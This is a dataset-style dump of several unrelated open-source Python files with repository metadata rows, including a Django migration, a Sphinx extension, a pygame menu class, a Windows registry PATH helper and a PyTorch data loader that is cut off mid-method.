    doc = Code(identifier='D1', volume='v1')
    assert doc == {
        'name': 'D1',
        'type': 'code',
        'env': [],
        'variables': [],
        'volume': 'v1'
    }
    vars = {'x': 1}
    env = {'TEST_ENV': 'abc'}
    doc = Docker(variables=vars, env=env, identifier='D2', volume='v1')
    assert doc == {
        'name': 'D2',
        'type': 'docker',
        'env': [{'key': 'TEST_ENV', 'value': 'abc'}],
        'variables': [{'key': 'x', 'value': 1}],
        'volume': 'v1'
    }
    doc = Subprocess(variables=vars, env=env, identifier='S2', volume='v1')
    assert doc == {
        'name': 'S2',
        'type': 'subprocess',
        'env': [{'key': 'TEST_ENV', 'value': 'abc'}],
        'variables': [{'key': 'x', 'value': 1}],
        'volume': 'v1'
    }
| 37.892562 | 116 | 0.639258 | 0 | 0 | 0 | 0 | 1,440 | 0.314068 | 0 | 0 | 1,676 | 0.36554 |
218be87fd5642367ab0f3fbe799b44f1dfb60d9c | 640 | py | Python | pyconcz/announcements/migrations/0002_announcement_font_size.py | martinpucala/cz.pycon.org-2019 | 044337ed0e7f721e96d88da69511ba5493d127e6 | [
"MIT"
] | 6 | 2018-08-25T13:40:22.000Z | 2019-05-25T21:58:41.000Z | pyconcz/announcements/migrations/0002_announcement_font_size.py | Giraafje/cz.pycon.org-2019 | f7bfad2f0c0f98368e2f6163f7dce70335549a68 | [
"MIT"
] | 188 | 2018-08-26T06:53:50.000Z | 2022-02-12T04:04:36.000Z | pyconcz/announcements/migrations/0002_announcement_font_size.py | Giraafje/cz.pycon.org-2019 | f7bfad2f0c0f98368e2f6163f7dce70335549a68 | [
"MIT"
] | 15 | 2018-11-03T06:32:34.000Z | 2020-02-11T21:17:14.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-06-11 05:18
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add `font_size` (1=largest .. 4=smallest)
    to the Announcement model."""
    dependencies = [
        ('announcements', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='announcement',
            name='font_size',
            field=models.PositiveSmallIntegerField(default=1, help_text='1 (largest) to 4 (smallest)', validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(4)]),
        ),
    ]
| 29.090909 | 206 | 0.676563 | 451 | 0.704688 | 0 | 0 | 0 | 0 | 0 | 0 | 155 | 0.242188 |
218c1665960b6db6a4d4a313af360d78024780d3 | 896 | py | Python | docs/_ext/db_tables_extension.py | wdr-data/wdr-okr | 71c9e6e8d3521b1bb67d30310a93584389de2127 | [
"MIT"
] | 2 | 2021-07-28T08:46:13.000Z | 2022-01-19T17:05:48.000Z | docs/_ext/db_tables_extension.py | wdr-data/wdr-okr | 71c9e6e8d3521b1bb67d30310a93584389de2127 | [
"MIT"
] | 3 | 2020-11-10T23:34:17.000Z | 2021-03-31T16:19:21.000Z | docs/_ext/db_tables_extension.py | wdr-data/wdr-okr | 71c9e6e8d3521b1bb67d30310a93584389de2127 | [
"MIT"
] | null | null | null | """Custom Sphinx extension to inject database documentation into a ReST document."""
from docutils import nodes
from docutils.parsers.rst import Directive
import sys
import os
import inspect
# Make the docs directory's parent importable so the sibling
# `database_tables` module can be imported from this Sphinx extension.
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
from database_tables import build_html  # noqa: E402
class DbTables(Directive):
    """Docutils directive that renders the 'okr' app's database tables as a
    raw HTML node."""
    def run(self):
        # build_html generates the table documentation wrapped in a
        # div#db_tables container.
        db_tables_html = build_html(
            app_labels=["okr"],
            html_top='<div id="db_tables">',
            html_bottom="</div>",
        )
        paragraph_node = nodes.raw("", db_tables_html, format="html")
        return [paragraph_node]
def setup(app):
    """Sphinx entry point: register the ``db_tables`` directive and declare
    extension metadata (parallel-safe)."""
    app.add_directive("db_tables", DbTables)
    metadata = {
        "version": "0.1",
        "parallel_read_safe": True,
        "parallel_write_safe": True,
    }
    return metadata
| 24.216216 | 86 | 0.668527 | 306 | 0.341518 | 0 | 0 | 0 | 0 | 0 | 0 | 205 | 0.228795 |
218cc1a2784c43a8ecfb6c736b8023171e1890c1 | 149 | py | Python | vb2py/PythonCard/__init__.py | ceprio/xl_vb2py | 899fec0301140fd8bd313e8c80b3fa839b3f5ee4 | [
"BSD-3-Clause"
] | null | null | null | vb2py/PythonCard/__init__.py | ceprio/xl_vb2py | 899fec0301140fd8bd313e8c80b3fa839b3f5ee4 | [
"BSD-3-Clause"
] | null | null | null | vb2py/PythonCard/__init__.py | ceprio/xl_vb2py | 899fec0301140fd8bd313e8c80b3fa839b3f5ee4 | [
"BSD-3-Clause"
] | null | null | null | """
Created: 2001/08/05
Purpose: Turn PythonCard into a package
__version__ = "$Revision: 1.1.1.1 $"
__date__ = "$Date: 2001/08/06 19:53:11 $"
"""
| 16.555556 | 41 | 0.651007 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 148 | 0.993289 |
218d8e2910387226505ef85b9f0bcefc1939728c | 764 | py | Python | xschem/bandgap_opamp/test/bandgap_bmr_test_op.py | yrrapt/caravel_amsat_txrx_ic | 53bef4537447a623f93772092daeac67c4cb3d45 | [
"Apache-2.0"
] | 15 | 2020-12-13T12:33:15.000Z | 2022-02-17T18:09:25.000Z | xschem/bandgap_opamp/test/bandgap_bmr_test_op.py | yrrapt/caravel_amsat_txrx_ic | 53bef4537447a623f93772092daeac67c4cb3d45 | [
"Apache-2.0"
] | null | null | null | xschem/bandgap_opamp/test/bandgap_bmr_test_op.py | yrrapt/caravel_amsat_txrx_ic | 53bef4537447a623f93772092daeac67c4cb3d45 | [
"Apache-2.0"
] | 6 | 2021-01-02T05:52:21.000Z | 2022-03-28T06:55:07.000Z | import SpiceInterface
import TestUtilities
# create the test utility object and generate the SPICE netlist from the
# xschem schematic into rundir/
test_utilities_obj = TestUtilities.TestUtilities()
test_utilities_obj.netlist_generation('bandgap_opamp_test_op.sch', 'rundir')
# create the spice interface around the generated netlist
spice_interface_obj = SpiceInterface.SpiceInterface(netlist_path="rundir/bandgap_opamp_test_op.spice")
spice_interface_obj.config['simulator']['shared'] = True
# add the op save parameters (saturation margin) for the bandgap mirror devices
devices = ['xbmr.XMcurr', 'xbmr.XMcurr1', 'xbmr.XM2', 'xbmr.XM3']
spice_interface_obj.insert_op_save(devices, ['vsat_marg'])
# run the simulation
spice_interface_obj.run_simulation()
# analyse the results: plot operating-point data over the temperature sweep
spice_interface_obj.plot_op_save(devices, ['vsat_marg'], 'temp-sweep')
['xbmr.XMcurr', 'xbmr.XMcurr1', 'xbmr.XM2', 'xbmr.XM3'] | 28.296296 | 102 | 0.789267 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 347 | 0.454188 |
218f388452a32732371a26acb9b1b26668fa0afb | 238 | py | Python | cloudmesh-exercises/cloudmesh-common-2.py | cybertraining-dsc/fa19-516-170 | 8746be5a89d897a155468303308efb71ce7ba849 | [
"Apache-2.0"
] | null | null | null | cloudmesh-exercises/cloudmesh-common-2.py | cybertraining-dsc/fa19-516-170 | 8746be5a89d897a155468303308efb71ce7ba849 | [
"Apache-2.0"
] | null | null | null | cloudmesh-exercises/cloudmesh-common-2.py | cybertraining-dsc/fa19-516-170 | 8746be5a89d897a155468303308efb71ce7ba849 | [
"Apache-2.0"
] | 1 | 2019-09-06T17:27:32.000Z | 2019-09-06T17:27:32.000Z | # fa19-516-170 E.Cloudmesh.Common.2
from cloudmesh.common.dotdict import dotdict
color = {"red": 255, "blue": 255, "green": 255, "alpha": 0}
color = dotdict(color)
print("A RGB color: ", color.red, color.blue, color.green, color.alpha) | 29.75 | 71 | 0.697479 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 75 | 0.315126 |
219042565e81d8c12997684eb40b91c86b416cb5 | 701 | py | Python | ex18.py | arunkumarang/python | 1960e285dfe2ef54d2e3ab37584bfef8b24ecca9 | [
"Apache-2.0"
] | null | null | null | ex18.py | arunkumarang/python | 1960e285dfe2ef54d2e3ab37584bfef8b24ecca9 | [
"Apache-2.0"
] | null | null | null | ex18.py | arunkumarang/python | 1960e285dfe2ef54d2e3ab37584bfef8b24ecca9 | [
"Apache-2.0"
] | null | null | null | #this one is like your scripts with argv
# Python 2 script (print statements). Unpacks exactly two positional args.
def print_two(*args):
	arg1, arg2 = args
	print "arg1: %r, arg2: %r" % (arg1, arg2)
#ok, the *args is actually pointless, we can just do this
def print_two_again(arg1, arg2):
	# Same as print_two but with named parameters (no *args needed).
	print "arg1: %r, arg2: %r" % (arg1, arg2)
#this just takes one argument
def print_one(arg1):
	# Prints a single argument's repr.
	print "arg1: %r" % arg1
#this one takes no arguments
def print_none():
	# Takes no arguments; prints a fixed message.
	print "I got nothin'."
def print_places(*argv):
	# Expects exactly three positional arguments (unpacking raises otherwise).
	place1, place2, place3 = argv
	print "place1: %r \t place2: %r \t place3: %r" %(place1, place2, place3)
print_two("Zed","Shaw")
print_two_again("Zed","Shaw")
print_one("First!")
print_none()
print_places("Bengaluru", "Chennai", "New Delhi")
| 24.172414 | 76 | 0.663338 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 321 | 0.457917 |
2190f77ed4afd28489afe1b10eb418ec19a517fe | 5,182 | py | Python | study_tool/entities/menu.py | cubeman99/russian-study-tool | b073df4694f1ad064a780088cdcb1436e1bde7e9 | [
"MIT"
] | null | null | null | study_tool/entities/menu.py | cubeman99/russian-study-tool | b073df4694f1ad064a780088cdcb1436e1bde7e9 | [
"MIT"
] | null | null | null | study_tool/entities/menu.py | cubeman99/russian-study-tool | b073df4694f1ad064a780088cdcb1436e1bde7e9 | [
"MIT"
] | null | null | null | from enum import IntEnum
import os
import pygame
import random
import time
import cmg
import cmg.mathlib
from cmg.application import *
from cmg.graphics import *
from cmg.input import *
from study_tool.config import Config
from study_tool.entities.entity import Entity
class Menu(Entity):
    """Scrollable vertical option menu rendered with pygame.

    The cursor is a float in [0, len(options)); the nearest integer is the
    highlighted option. When the option list is taller than the viewport the
    menu smoothly scrolls to keep the cursor centered.
    """
    def __init__(self, options, viewport):
        # options: iterable of menu entries (plain values or tuples whose
        # first element is displayed); viewport: pygame.Rect-like draw area.
        super().__init__()
        self.cursor = 0.0
        self.options = list(options)
        self.viewport = viewport
        self.option_font = pygame.font.Font(None, 42)
        self.option_spacing = 40  # row height in pixels
        self.option_margin = 48   # horizontal margin around rows
        self.scroll_position = 0.0
        self.option_border_thickness = 4
    def selected_option(self):
        # The option currently under the (rounded) cursor.
        option_index = int(round(self.cursor))
        return self.options[option_index]
    def get_option_background_color(self, index, option, highlighted=False):
        # Alternating row colors; distinct color for the highlighted row.
        if highlighted:
            return Config.option_highlighted_background_color
        else:
            return Config.option_background_colors[index % 2]
    def get_option_border_color(self, index, option, highlighted=False):
        # Border color matches the row's highlighted/alternating scheme.
        if highlighted:
            return Config.option_highlighted_border_color
        else:
            return Config.option_border_colors[index % 2]
    def draw_menu_option_text(self, g, option, rect, highlighted=False):
        # Draw the option label left-aligned, vertically centered in rect.
        if highlighted:
            text_color = Config.option_highlighted_text_color
        else:
            text_color = Config.option_text_color
        # Tuple options display their first element only.
        if isinstance(option, tuple):
            option = option[0]
        g.draw_text(rect.x + 16, rect.y + (rect.height / 2),
                    text=str(option), font=self.option_font,
                    color=text_color, align=cmg.Align.MiddleLeft)
    def update(self, dt):
        app = self.context
        # Update cursor movement: input axis 2 moves down, axis 0 moves up;
        # response is super-linear (|move|^1.5) for finer slow control.
        move = app.inputs[2].get_amount() - app.inputs[0].get_amount()
        sign = cmg.mathlib.sign(move)
        speed = Config.menu_cursor_speed
        self.cursor += cmg.mathlib.pow(abs(move), 1.5) * sign * dt * speed
        # Wrap the cursor around both ends of the option list.
        if self.cursor < 0.5:
            self.cursor += len(self.options)
        if self.cursor > len(self.options) - 0.5:
            self.cursor -= len(self.options)
        option_list_height = len(self.options) * self.option_spacing
        option_area_height = self.viewport.height
        if option_list_height > option_area_height:
            # Scroll so the cursor row sits at the viewport's vertical center,
            # clamped to the list bounds, eased with lerp and snapped when close.
            desired_scroll_position = (((self.cursor + 0.5) * self.option_spacing) -
                                       option_area_height / 2)
            desired_scroll_position = max(0, desired_scroll_position)
            desired_scroll_position = min(desired_scroll_position,
                                          option_list_height - option_area_height)
            self.scroll_position = cmg.mathlib.lerp(
                self.scroll_position,
                desired_scroll_position,
                0.2)
            if abs(self.scroll_position - desired_scroll_position) < 2:
                self.scroll_position = desired_scroll_position
        else:
            self.scroll_position = 0
    def draw(self, g):
        top = -self.scroll_position
        option_index = int(round(self.cursor))
        option_top = self.viewport.y + top
        row_width = self.viewport.width - (self.option_margin * 2)
        border_row_width = row_width + (self.option_border_thickness * 2)
        # Draw the cursor
        cursor_y = option_top + ((self.cursor + 0.5) * self.option_spacing)
        g.fill_rect(self.viewport.x + self.option_margin -
                    self.option_border_thickness - Config.option_cursor_width,
                    cursor_y - (Config.option_cursor_height / 2),
                    border_row_width + (Config.option_cursor_width * 2),
                    Config.option_cursor_height,
                    color=Config.option_cursor_color)
        # Draw menu options
        for index, option in enumerate(self.options):
            y = option_top + (index * self.option_spacing)
            center_y = y + (self.option_spacing / 2)  # NOTE: currently unused
            highlighted = index == option_index
            row_color = self.get_option_background_color(
                index, option, highlighted)
            border_color = self.get_option_border_color(
                index, option, highlighted)
            row_rect = pygame.Rect(self.viewport.x + self.option_margin, y,
                                   row_width, self.option_spacing)
            # Draw the option border (extends above/below first/last rows)
            border_rect = pygame.Rect(row_rect)
            border_rect.inflate_ip(self.option_border_thickness * 2, 0)
            if index == 0:
                border_rect.y -= self.option_border_thickness
                border_rect.height += self.option_border_thickness
            if index == len(self.options) - 1:
                border_rect.height += self.option_border_thickness
            g.fill_rect(border_rect, color=border_color)
            # Draw the row background
            g.fill_rect(row_rect, color=row_color)
            # Draw the option name
            self.draw_menu_option_text(g, option, row_rect,
                                       highlighted=highlighted)
| 40.484375 | 84 | 0.614628 | 4,910 | 0.947511 | 0 | 0 | 0 | 0 | 0 | 0 | 131 | 0.02528 |
2191076de1edb4c0b0a54d9d4d3796be34c4306f | 3,677 | py | Python | zhangwei_helper/function/Regedit.py | zwzw911/zhangwei_helper | 8696533f5df50464d619a35834ec19d514a1b13b | [
"MIT"
] | null | null | null | zhangwei_helper/function/Regedit.py | zwzw911/zhangwei_helper | 8696533f5df50464d619a35834ec19d514a1b13b | [
"MIT"
] | null | null | null | zhangwei_helper/function/Regedit.py | zwzw911/zhangwei_helper | 8696533f5df50464d619a35834ec19d514a1b13b | [
"MIT"
] | null | null | null | '''
对windows的注册表进行操作
_open_key: 返回key
_read_key_value:读取key下一个value的值和类型
_save_key_value:以某种类型的方式,把值保存到某个key中
read_PATH_value:读取环境变量PATH的值
append_value_in_PATH:为PATH添加一个值
del_value_in_PATH:从PATH中删除一个值
check_key_value_exists(key,value_name):检查某个key小,value_name是否存在
create_value(key,value_name,value_type,value): 直接调用_save_key_value
delete_value(key,value_name): 删除key下的value
'''
import winreg
def _open_key(root_key_name, sub_key_name):
    """Open *sub_key_name* under *root_key_name* with KEY_ALL_ACCESS.

    Raises EnvironmentError (with a human-readable root-key name in the
    message) when the key cannot be opened.
    """
    try:
        return winreg.OpenKey(root_key_name, sub_key_name, 0, winreg.KEY_ALL_ACCESS)
    except Exception:
        # Translate the numeric root-key constant into its symbolic name so
        # the error message is readable; unknown roots are reported as-is.
        readable_roots = {
            winreg.HKEY_CURRENT_USER: 'HKEY_CURRENT_USER',
            winreg.HKEY_CLASSES_ROOT: 'HKEY_CLASSES_ROOT',
            winreg.HKEY_CURRENT_CONFIG: 'HKEY_CURRENT_CONFIG',
            winreg.HKEY_DYN_DATA: 'HKEY_DYN_DATA',
            winreg.HKEY_LOCAL_MACHINE: 'HKEY_LOCAL_MACHINE',
            winreg.HKEY_PERFORMANCE_DATA: 'HKEY_PERFORMANCE_DATA',
            winreg.HKEY_USERS: 'HKEY_USERS',
        }
        root_key_name = readable_roots.get(root_key_name, root_key_name)
        raise EnvironmentError('注册表的项%s\%s不存在' % (root_key_name, sub_key_name))
# val, tpe = winreg.QueryValueEx(sub_item, key_name)
def _read_key_value(key, value_name):
    """Return the (data, registry_type) tuple stored for *value_name* under *key*."""
    return winreg.QueryValueEx(key, value_name)
def _save_key_value(key, value_name, value_type, value):
    """Write *value* with registry type *value_type* as *value_name* under *key*."""
    winreg.SetValueEx(key, value_name, 0, value_type, value)
def check_key_value_exists(key, value_name):
    """Return True when *value_name* exists under *key* (case-insensitive)."""
    _, value_count, _ = winreg.QueryInfoKey(key)
    wanted = value_name.lower()
    for position in range(value_count):
        existing_name, _, _ = winreg.EnumValue(key, position)
        if existing_name.lower() == wanted:
            return True
    return False
def create_value(key,value_name,value_type,value):
    """Create (or overwrite) *value_name* under *key*; wraps _save_key_value."""
    _save_key_value(key,value_name,value_type,value)
def delete_value(key,value_name):
    """Delete the value named *value_name* from under *key*."""
    winreg.DeleteValue(key,value_name)
def read_PATH_value():
    """Read the user PATH environment variable from HKCU\\Environment.

    Returns:
        (value, registry_type): the PATH string and its registry type.
    """
    key = _open_key(winreg.HKEY_CURRENT_USER, r'Environment')
    try:
        return _read_key_value(key, r'PATH')
    finally:
        # BUGFIX: the original never closed the key handle, leaking it.
        winreg.CloseKey(key)
def append_value_in_PATH(v):
    """Append entry *v* to the user PATH unless it is already present."""
    key = _open_key(winreg.HKEY_CURRENT_USER, r'Environment')
    try:
        val, tpe = _read_key_value(key, r'PATH')
        entries = val.split(';')
        # NOTE(review): membership test is case-sensitive although Windows
        # paths are not -- confirm whether a case-insensitive check is wanted.
        if v not in entries:
            _save_key_value(key, r'PATH', tpe, val + ';' + v)
    finally:
        # Close the handle even when reading/writing fails (original leaked it
        # on any exception between open and close).
        winreg.CloseKey(key)
def del_value_in_PATH(v):
    """Remove entry *v* from the user PATH; a no-op when *v* is absent.

    BUGFIX: the original called list.remove() unconditionally, raising
    ValueError when *v* was not in PATH, and its docstring was a copy-paste
    of the append function ("add v to PATH").
    """
    key = _open_key(winreg.HKEY_CURRENT_USER, r'Environment')
    try:
        val, tpe = _read_key_value(key, r'PATH')
        entries = val.split(';')
        if v in entries:
            entries.remove(v)
            _save_key_value(key, r'PATH', tpe, ';'.join(entries))
    finally:
        # Always release the registry handle (original leaked it on error).
        winreg.CloseKey(key)
# key = _open_key(winreg.HKEY_CURRENT_USER, r'Environment')
# delete_value(key, 'test') | 30.89916 | 82 | 0.700027 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,411 | 0.359124 |
2192768bff882444e0830f98671a750d87dcfce9 | 22,767 | py | Python | deep_staple/HybridIdLoader.py | multimodallearning/deep_staple | a27ed9e214bbac96aeab122b05b59b0222cce5c5 | [
"MIT"
] | null | null | null | deep_staple/HybridIdLoader.py | multimodallearning/deep_staple | a27ed9e214bbac96aeab122b05b59b0222cce5c5 | [
"MIT"
] | null | null | null | deep_staple/HybridIdLoader.py | multimodallearning/deep_staple | a27ed9e214bbac96aeab122b05b59b0222cce5c5 | [
"MIT"
] | null | null | null | import warnings
from collections.abc import Iterable
from collections import OrderedDict
import torch
import numpy as np
from torch.utils.data import Dataset
from deep_staple.utils.torch_utils import interpolate_sample, augmentNoise, spatial_augment, torch_manual_seeded, ensure_dense
from deep_staple.utils.common_utils import LabelDisturbanceMode
class HybridIdLoader(Dataset):
    def __init__(self,
            data_load_function,
            ensure_labeled_pairs=True, use_additional_data=False, resample=True,
            size:tuple=(96,96,60), normalize:bool=True,
            max_load_3d_num=None, crop_3d_w_dim_range=None, modified_3d_label_override=None,
            prevent_disturbance=False,
            use_2d_normal_to=None, crop_2d_slices_gt_num_threshold=None, pre_interpolation_factor=2.,
            fixed_weight_file = None, fixed_weight_min_quantile=None, fixed_weight_min_value=None
        ):
        """Load 3D volumes via *data_load_function*, optionally slice them into
        2D views, and postprocess (pairing, cropping, fixed-weight filtering).

        Args:
            data_load_function: callable returning (img_paths, label_paths,
                img_data_3d, label_data_3d, modified_label_data_3d,
                extract_3d_id, extract_short_3d_id).
            ensure_labeled_pairs: drop images/modified labels without a GT label.
            max_load_3d_num: keep at most this many 3D volumes (sorted by id).
            use_2d_normal_to: one of "D"/"H"/"W" to slice volumes into 2D views,
                or None for pure 3D operation.
            crop_2d_slices_gt_num_threshold: drop 2D slices with too little GT.
                NOTE(review): default is None and the code compares `None > 0`,
                which raises TypeError on Python 3 -- confirm callers always
                pass an int.
            fixed_weight_file / fixed_weight_min_quantile / fixed_weight_min_value:
                optionally filter samples by previously-trained data parameters.
        """
        self.label_tags = []
        self.use_2d_normal_to = use_2d_normal_to
        self.crop_2d_slices_gt_num_threshold = crop_2d_slices_gt_num_threshold
        self.prevent_disturbance = prevent_disturbance

        self.do_augment = False
        self.use_modified = False
        self.disturbed_idxs = []
        self.augment_at_collate = False
        self.pre_interpolation_factor = pre_interpolation_factor

        # Identity defaults; overwritten by data_load_function below.
        self.extract_3d_id = lambda _:_
        self.extract_short_3d_id = lambda _:_

        self.img_paths = {}
        self.label_paths = {}
        self.img_data_3d = {}
        self.label_data_3d = {}
        self.modified_label_data_3d = {}

        # Load base 3D data
        (self.img_paths, self.label_paths,
            self.img_data_3d, self.label_data_3d,
            self.modified_label_data_3d,
            self.extract_3d_id, self.extract_short_3d_id) = data_load_function()

        # Retrieve slices and plugin modified data
        self.img_data_2d = {}
        self.label_data_2d = {}
        self.modified_label_data_2d = {}

        # Postprocessing of 3d volumes
        print("Postprocessing 3D volumes")
        orig_3d_num = len(self.label_data_3d.keys())

        if ensure_labeled_pairs:
            # Keep only samples that have a ground-truth label.
            labelled_keys = set(self.label_data_3d.keys())
            unlabelled_imgs = set(self.img_data_3d.keys()) - labelled_keys
            unlabelled_modified_labels = set([self.extract_3d_id(key) for key in self.modified_label_data_3d.keys()]) - labelled_keys
            for del_key in unlabelled_imgs:
                del self.img_data_3d[del_key]
            for del_key in unlabelled_modified_labels:
                del self.modified_label_data_3d[del_key]

        if max_load_3d_num:
            # Truncate all three 3D stores to the first max_load_3d_num sorted ids.
            for del_key in sorted(list(self.img_data_3d.keys()))[max_load_3d_num:]:
                del self.img_data_3d[del_key]
            for del_key in sorted(list(self.label_data_3d.keys()))[max_load_3d_num:]:
                del self.label_data_3d[del_key]
            for del_key in sorted(list(self.modified_label_data_3d.keys()))[max_load_3d_num:]:
                del self.modified_label_data_3d[del_key]

        postprocessed_3d_num = len(self.label_data_3d.keys())
        print(f"Removed {orig_3d_num - postprocessed_3d_num} 3D images in postprocessing")

        #check for consistency
        print(f"Equal image and label numbers: {set(self.img_data_3d)==set(self.label_data_3d)==set(self.modified_label_data_3d)} ({len(self.img_data_3d)})")

        img_stack = torch.stack(list(self.img_data_3d.values()), dim=0)
        img_mean, img_std = img_stack.mean(), img_stack.std()

        label_stack = torch.stack(list(self.label_data_3d.values()), dim=0)

        print("Image shape: {}, mean.: {:.2f}, std.: {:.2f}".format(img_stack.shape, img_mean, img_std))
        print("Label shape: {}, max.: {}".format(label_stack.shape,torch.max(label_stack)))

        if use_2d_normal_to:
            # Map the slicing axis letter to the tensor dimension.
            if use_2d_normal_to == "D":
                slice_dim = -3
            if use_2d_normal_to == "H":
                slice_dim = -2
            if use_2d_normal_to == "W":
                slice_dim = -1

            for _3d_id, image in self.img_data_3d.items():
                for idx, img_slc in [(slice_idx, image.select(slice_dim, slice_idx)) \
                        for slice_idx in range(image.shape[slice_dim])]:
                    # Set data view for id like "003rW100"
                    self.img_data_2d[f"{_3d_id}{use_2d_normal_to}{idx:03d}"] = img_slc

            for _3d_id, label in self.label_data_3d.items():
                for idx, lbl_slc in [(slice_idx, label.select(slice_dim, slice_idx)) \
                        for slice_idx in range(label.shape[slice_dim])]:
                    # Set data view for id like "003rW100"
                    self.label_data_2d[f"{_3d_id}{use_2d_normal_to}{idx:03d}"] = lbl_slc

            for _3d_id, label in self.modified_label_data_3d.items():
                for idx, lbl_slc in [(slice_idx, label.select(slice_dim, slice_idx)) \
                        for slice_idx in range(label.shape[slice_dim])]:
                    # Set data view for id like "003rW100"
                    self.modified_label_data_2d[f"{_3d_id}{use_2d_normal_to}{idx:03d}"] = lbl_slc

        # Postprocessing of 2d slices
        print("Postprocessing 2D slices")
        orig_2d_num = len(self.label_data_2d.keys())

        if self.crop_2d_slices_gt_num_threshold > 0:
            for key, label in list(self.label_data_2d.items()):
                uniq_vals = label.unique()

                if sum(label[label > 0]) < self.crop_2d_slices_gt_num_threshold:
                    # Delete 2D slices with less than n gt-pixels (but keep 3d data)
                    # NOTE(review): this sums label *values*, not a pixel count --
                    # for multi-class labels those differ; confirm intent.
                    del self.img_data_2d[key]
                    del self.label_data_2d[key]
                    del self.modified_label_data_2d[key]

        postprocessed_2d_num = len(self.label_data_2d.keys())
        print(f"Removed {orig_2d_num - postprocessed_2d_num} of {orig_2d_num} 2D slices in postprocessing")

        if fixed_weight_file is not None and any([fixed_weight_min_quantile, fixed_weight_min_value]):
            # Filter out samples whose previously-learned data parameter
            # (per-sample weight) falls below a minimum value / quantile.
            fixed_weightdata = torch.load(fixed_weight_file)
            fixed_weights = fixed_weightdata['data_parameters'].detach().cpu()
            fixed_d_ids = fixed_weightdata['d_ids']
            print(f"Fixed weight quantiles are: {np.quantile(fixed_weights, np.linspace(0.,1.,5))}")

            if fixed_weight_min_quantile is not None:
                # Quantile takes precedence over an explicit minimum value.
                fixed_weight_min_value = np.quantile(fixed_weights, fixed_weight_min_quantile)
            elif fixed_weight_min_value is not None:
                pass

            fixed_del_counter = 0

            for key, weight in zip(fixed_d_ids, fixed_weights):
                if weight < fixed_weight_min_value:
                    if use_2d_normal_to:
                        del self.img_data_2d[key]
                        del self.label_data_2d[key]
                        del self.modified_label_data_2d[key]
                    else:
                        del self.img_data_3d[key]
                        del self.label_data_3d[key]
                        del self.modified_label_data_3d[key]
                    fixed_del_counter+=1
            print(f"Removed {fixed_del_counter} data samples by cropping data with fixed weight min value = {fixed_weight_min_value:.3f}")

        # Now make sure dicts are ordered
        self.img_paths = OrderedDict(sorted(self.img_paths.items()))
        self.label_paths = OrderedDict(sorted(self.label_paths.items()))
        self.img_data_3d = OrderedDict(sorted(self.img_data_3d.items()))
        self.label_data_3d = OrderedDict(sorted(self.label_data_3d.items()))
        self.modified_label_data_3d = OrderedDict(sorted(self.modified_label_data_3d.items()))
        self.img_data_2d = OrderedDict(sorted(self.img_data_2d.items()))
        self.label_data_2d = OrderedDict(sorted(self.label_data_2d.items()))
        self.modified_label_data_2d = OrderedDict(sorted(self.modified_label_data_2d.items()))

        # NOTE(review): the ratios below divide by len(...) of the 2D stores,
        # which is zero when use_2d_normal_to is None -- confirm the loader is
        # only constructed with 2D slicing enabled.
        nonzero_lbl_percentage = torch.tensor([lbl.sum((-2,-1)) > 0 for lbl in self.label_data_2d.values()]).sum()
        nonzero_lbl_percentage = nonzero_lbl_percentage/len(self.label_data_2d)
        print(f"Nonzero labels: " f"{nonzero_lbl_percentage*100:.2f}%")

        nonzero_mod_lbl_percentage = torch.tensor([ensure_dense(lbl)[0].sum((-2,-1)) > 0 for lbl in self.modified_label_data_2d.values()]).sum()
        nonzero_mod_lbl_percentage = nonzero_mod_lbl_percentage/len(self.modified_label_data_2d)
        print(f"Nonzero modified labels: " f"{nonzero_mod_lbl_percentage*100:.2f}%")

        print(f"Loader will use {postprocessed_2d_num} of {orig_2d_num} 2D slices.")
        print("Data import finished.")
        print(f"Dataloader will yield {'2D' if self.use_2d_normal_to else '3D'} samples")
def get_short_3d_ids(self):
return [self.extract_short_3d_id(_id) for _id in self.get_3d_ids()]
def get_3d_ids(self):
return list(self.img_data_3d.keys())
def get_2d_ids(self):
assert self.use_2d(), "Dataloader does not provide 2D data."
return list(self.img_data_2d.keys())
def get_id_dicts(self, use_2d_override=None):
all_3d_ids = self.get_3d_ids()
id_dicts = []
if self.use_2d(use_2d_override):
for _2d_dataset_idx, _2d_id in enumerate(self.get_2d_ids()):
_3d_id = _2d_id[:-4]
id_dicts.append(
{
'2d_id': _2d_id,
'2d_dataset_idx': _2d_dataset_idx,
'3d_id': _3d_id,
'3d_dataset_idx': all_3d_ids.index(_3d_id),
}
)
else:
for _3d_dataset_idx, _3d_id in enumerate(self.get_3d_ids()):
id_dicts.append(
{
'3d_id': _3d_id,
'3d_dataset_idx': all_3d_ids.index(_3d_id),
}
)
return id_dicts
def switch_2d_identifiers(self, _2d_identifiers):
assert self.use_2d(), "Dataloader does not provide 2D data."
if isinstance(_2d_identifiers, (torch.Tensor, np.ndarray)):
_2d_identifiers = _2d_identifiers.tolist()
elif not isinstance(_2d_identifiers, Iterable) or isinstance(_2d_identifiers, str):
_2d_identifiers = [_2d_identifiers]
_ids = self.get_2d_ids()
if all([isinstance(elem, int) for elem in _2d_identifiers]):
vals = [_ids[elem] for elem in _2d_identifiers]
elif all([isinstance(elem, str) for elem in _2d_identifiers]):
vals = [_ids.index(elem) for elem in _2d_identifiers]
else:
raise ValueError
return vals[0] if len(vals) == 1 else vals
def switch_3d_identifiers(self, _3d_identifiers):
if isinstance(_3d_identifiers, (torch.Tensor, np.ndarray)):
_3d_identifiers = _3d_identifiers.tolist()
elif not isinstance(_3d_identifiers, Iterable) or isinstance(_3d_identifiers, str):
_3d_identifiers = [_3d_identifiers]
_ids = self.get_3d_ids()
if all([isinstance(elem, int) for elem in _3d_identifiers]):
vals = [_ids[elem] for elem in _3d_identifiers]
elif all([isinstance(elem, str) for elem in _3d_identifiers]):
vals = [_ids.index(elem) if elem in _ids else None for elem in _3d_identifiers]
else:
raise ValueError
return vals[0] if len(vals) == 1 else vals
def get_3d_from_2d_identifiers(self, _2d_identifiers, retrn='id'):
